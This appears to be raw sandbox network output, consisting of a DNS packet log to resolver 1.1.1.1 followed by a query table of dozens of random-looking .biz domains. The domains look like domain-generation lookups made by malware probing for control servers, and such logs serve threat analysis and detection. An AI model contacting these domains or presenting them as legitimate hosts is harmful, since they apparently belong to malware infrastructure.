                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.008994102 CEST5794853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.017364025 CEST53579481.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.247271061 CEST5941253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.270977974 CEST5941253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429665089 CEST53594121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429682016 CEST53594121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.038657904 CEST5660553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.068919897 CEST5660553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267066956 CEST53566051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267091036 CEST53566051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.388348103 CEST5382753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.396401882 CEST53538271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.894006968 CEST5531953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.902245045 CEST53553191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.480323076 CEST6130853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.488837957 CEST53613081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.202472925 CEST4936053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.211448908 CEST53493601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.045087099 CEST5255453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.067276001 CEST5255453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294387102 CEST53525541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294405937 CEST53525541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.160675049 CEST6514653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.170397043 CEST53651461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.149418116 CEST5374753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.157155037 CEST53537471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.690341949 CEST6233653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.698559999 CEST53623361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.747225046 CEST5452553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.754949093 CEST53545251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.325552940 CEST6287053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.332644939 CEST53628701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.333462954 CEST5736653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.340930939 CEST53573661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.236162901 CEST4926553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.257669926 CEST4926553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.430032015 CEST5773253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.449840069 CEST53492651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.451421976 CEST53492651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.457879066 CEST5773253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582195044 CEST53577321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582214117 CEST53577321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.950795889 CEST5067153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.958690882 CEST53506711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.178881884 CEST5011753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.189076900 CEST53501171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.702183962 CEST6333753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.710712910 CEST53633371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.210357904 CEST6316853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.238995075 CEST6316853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.935528040 CEST6258053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.957787037 CEST6258053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:20.973753929 CEST6258053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.078119040 CEST53625801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.078172922 CEST53625801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.080030918 CEST6352853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.083045959 CEST53625801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.091000080 CEST53635281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.989650965 CEST5574253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.997060061 CEST53557421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.682863951 CEST5946053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.690917015 CEST53594601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.768739939 CEST5125853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.776432037 CEST53512581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.588457108 CEST6002153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.591133118 CEST6226653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.614044905 CEST6226653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.614067078 CEST6002153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.780838013 CEST53600211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.780855894 CEST53600211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.789833069 CEST53622661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.789846897 CEST53622661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.900058985 CEST4999153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.909574986 CEST53499911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686944008 CEST5953753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.687927008 CEST6470553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.707962990 CEST6470553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.707995892 CEST5953753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.969969034 CEST53647051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.970031977 CEST53647051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.970918894 CEST53595371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.971287012 CEST53595371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.470048904 CEST5608153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.477132082 CEST53560811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.979340076 CEST6237753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.986869097 CEST53623771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314840078 CEST6213053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.321964979 CEST53621301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.469049931 CEST6531653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.477036953 CEST53653161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.799125910 CEST5903153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.806025982 CEST53590311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.973304033 CEST5489253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.004970074 CEST5489253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.167625904 CEST53548921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.167643070 CEST53548921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.274749041 CEST5586253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.282222033 CEST53558621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.042572975 CEST5540353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.050183058 CEST53554031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.522382975 CEST5145653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.530766010 CEST53514561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.709728003 CEST6025553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.716885090 CEST53602551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.195297003 CEST5449953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.203341007 CEST53544991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.273801088 CEST5309453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.284136057 CEST53530941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.736218929 CEST5687853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.744889975 CEST53568781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.404572964 CEST5606853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.412753105 CEST53560681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.410911083 CEST6083753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.419359922 CEST53608371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.420227051 CEST5376153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.429784060 CEST53537611.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.778232098 CEST6386953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.785809040 CEST53638691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.786683083 CEST5664553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795036077 CEST53566451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795753002 CEST5903853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.806251049 CEST53590381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.412271976 CEST5540253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.420854092 CEST53554021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.104495049 CEST6243853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.113141060 CEST53624381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.802922964 CEST4950053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.811852932 CEST53495001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.145896912 CEST5142253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.154448032 CEST53514221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.751966953 CEST6045253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.761208057 CEST53604521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.333559036 CEST5891753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.341305971 CEST53589171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.695791960 CEST5272353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.707365036 CEST53527231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.721791029 CEST5354553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.739372969 CEST5354553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.911767960 CEST53535451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.912312984 CEST53535451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.674520969 CEST6552853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.683409929 CEST53655281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.188338041 CEST5932153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.198812962 CEST53593211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.830955982 CEST6238753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.838720083 CEST53623871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.186583042 CEST5682153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.196471930 CEST53568211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.888664007 CEST5283253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.895880938 CEST53528321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.631711960 CEST5825553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.642970085 CEST53582551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.389748096 CEST5805153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.411658049 CEST5805153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482764006 CEST53580511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482780933 CEST53580511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.979176044 CEST6453853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.987709999 CEST53645381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.046585083 CEST5253753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.054546118 CEST53525371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.148015022 CEST6124053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.156081915 CEST53612401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.176611900 CEST4966453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.185369015 CEST53496641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.258775949 CEST5307253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.266381025 CEST53530721.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.144165993 CEST192.168.2.41.1.1.10xb990Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.347379923 CEST192.168.2.41.1.1.10x92f0Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.900764942 CEST192.168.2.41.1.1.10x7154Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.000443935 CEST192.168.2.41.1.1.10x179aStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.875027895 CEST192.168.2.41.1.1.10x3464Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.355310917 CEST192.168.2.41.1.1.10xc463Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.363804102 CEST192.168.2.41.1.1.10xce8Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.848520041 CEST192.168.2.41.1.1.10x7146Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.964797974 CEST192.168.2.41.1.1.10x3951Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.611051083 CEST192.168.2.41.1.1.10x4c3aStandard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.123080015 CEST192.168.2.41.1.1.10xef01Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.462775946 CEST192.168.2.41.1.1.10x8810Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.922153950 CEST192.168.2.41.1.1.10x4126Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.900885105 CEST192.168.2.41.1.1.10x5a11Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.243163109 CEST192.168.2.41.1.1.10x24bcStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:05.819854975 CEST192.168.2.41.1.1.10x2a38Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:06.135782003 CEST192.168.2.41.1.1.10xd9dfStandard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.535593987 CEST192.168.2.41.1.1.10x6ef2Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.547425032 CEST192.168.2.41.1.1.10xd718Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:07.622749090 CEST192.168.2.41.1.1.10x298Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:08.392416000 CEST192.168.2.41.1.1.10x2fe4Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.090029001 CEST192.168.2.41.1.1.10xb164Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:09.151376963 CEST192.168.2.41.1.1.10x4b25Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.140163898 CEST192.168.2.41.1.1.10xb88fStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.790467024 CEST192.168.2.41.1.1.10xcee4Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:10.862623930 CEST192.168.2.41.1.1.10xc0ffStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:11.492038012 CEST192.168.2.41.1.1.10x71b2Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.481775045 CEST192.168.2.41.1.1.10x4ddStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:12.511537075 CEST192.168.2.41.1.1.10x8740Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.287781000 CEST192.168.2.41.1.1.10xb294Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.597270012 CEST192.168.2.41.1.1.10x37e3Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.802829981 CEST192.168.2.41.1.1.10x82eeStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.097446918 CEST192.168.2.41.1.1.10x141dStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.759212017 CEST192.168.2.41.1.1.10xa8ceStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.058988094 CEST192.168.2.41.1.1.10xe340Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.692397118 CEST192.168.2.41.1.1.10xe2b7Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.177506924 CEST192.168.2.41.1.1.10x1279Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.228328943 CEST192.168.2.41.1.1.10xcd76Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.239413977 CEST192.168.2.41.1.1.10xfbe9Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.911716938 CEST192.168.2.41.1.1.10x447fStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.611911058 CEST192.168.2.41.1.1.10x49Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
